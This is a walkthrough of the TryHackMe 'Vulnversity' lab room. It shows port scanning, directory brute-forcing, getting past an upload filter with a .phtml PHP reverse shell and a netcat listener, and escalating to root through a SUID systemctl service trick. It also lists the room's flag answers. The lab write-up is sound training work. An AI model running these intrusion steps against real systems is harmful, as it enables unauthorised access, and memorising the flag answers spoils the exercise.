Vulnversity — Walkthrough Tryhackme
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHacMe Top 1% ||Programing C,Python || Bug Bounty ||
Introduction
"Vulnversity" is an introductory level room on TryHackMe that covers various penetration testing methodologies and tools. It includes tasks such as scanning, enumeration, exploitation, and post-exploitation techniques.
Task 1: Deploy the Machine
Task 2: Reconnaissance
rustscan -a 10.10.111.210 -- -A
We can see that ports 21, 22, 139, 445, 3128 and 3333 are open.
It is clearly visible that the OS is Ubuntu, on which the WebServer(port 3333) is running.
Scan the box, how many ports are open?
Ans. 6
What version of the squid proxy is running on the machine?
Ans. 3.5.12
What is the most likely operating system this machine is running?
Ans. Ubuntu
What port is the web server running on?
Ans.3333
It's essential to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don't forget that ports on a higher range might be open, so constantly scan ports after 1000 (even if you leave checking in the background).
Ans. No answer needed
What is the flag for enabling verbose mode using Nmap?
Ans. -v
Task 3: Locating directories using Gobuster:
Objective: Use GoBuster to find hidden directories.
Gobuster is a popular tool used in penetration testing for brute-forcing directories and files on web servers, as well as DNS subdomains. It's written in Go language, which makes it fast and efficient. Here's a breakdown of its main features and uses:
gobuster dir -u https://10.10.111.210:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
We find an /internal directory and further enumeration leads to /internal/uploads directory.
What is the directory that has an upload form page?
Ans. /internal/
Task 4: Compromise the webserver
We try to upload a php reverse shell script but the extension is being filtered.
"We start Burp Suite and enable it in FoxyProxy. Then, create a file with different PHP extensions for the Sniper attack."
We capture the upload request and then send it to Intruder.
We load our payload as a simple list.
We start our attack and receive the results. Interestingly, every extension returns a Status 200, but the length of the .phtml extension is different from the others."
I uploaded a reverse php shell from pentestmonkey and navigated to “/interal/uploads/rev-shell.phtml” and also set up a netcat listener on port 8888/tcp. Than change extensions .phtml
We start a netcat listener: than visit Upload your shell and navigate to?https://10.10.111.210:3333/internal/uploads/php-reverse-shell.phtml?- This will execute your payload.
nc -lvnp 8888
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
Ans. .php
I understand the Burpsuite tool and its purpose during pentesting.
Ans. No answer needed
What extension is allowed after running the above exercise?
Ans. .phtml
While completing the above exercise, I have successfully downloaded the PHP reverse shell.
Ans. No answer needed
What is the name of the user who manages the webserver?
Ans. bill
python -c 'import pty; pty.spawn("/bin/bash")'
What is the user flag?
Ans. 8bd7992fbe8a6ad22a63361004cfcedb
Task 5: Privilege Escalation:
With the reverse shell in place, you need to escalate your privileges to gain full control of the machine. Check for any sudo privileges or SUID binaries that might be exploitable:
find / -perm -u=s -type f 2>/dev/null
"We see that /bin/systemctl is a SUID binary, which we can use to gain privileged access. Let's check GTFOBins and search for systemctl.
Reference: [https://gtfobins.github.io/gtfobins/systemctl/]"
We create a temporary service and then use that to view root.txt file
TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$TF
/bin/systemctl link $TF
/bin/systemctl enable?--now?$TF
cd /tmp
cat output
On the system, search for all SUID files. Which file stands out?
Ans. /bin/systemctl
What is the root flag value?
Ans. a58ff8579f0a9270368d33a9966c7fd5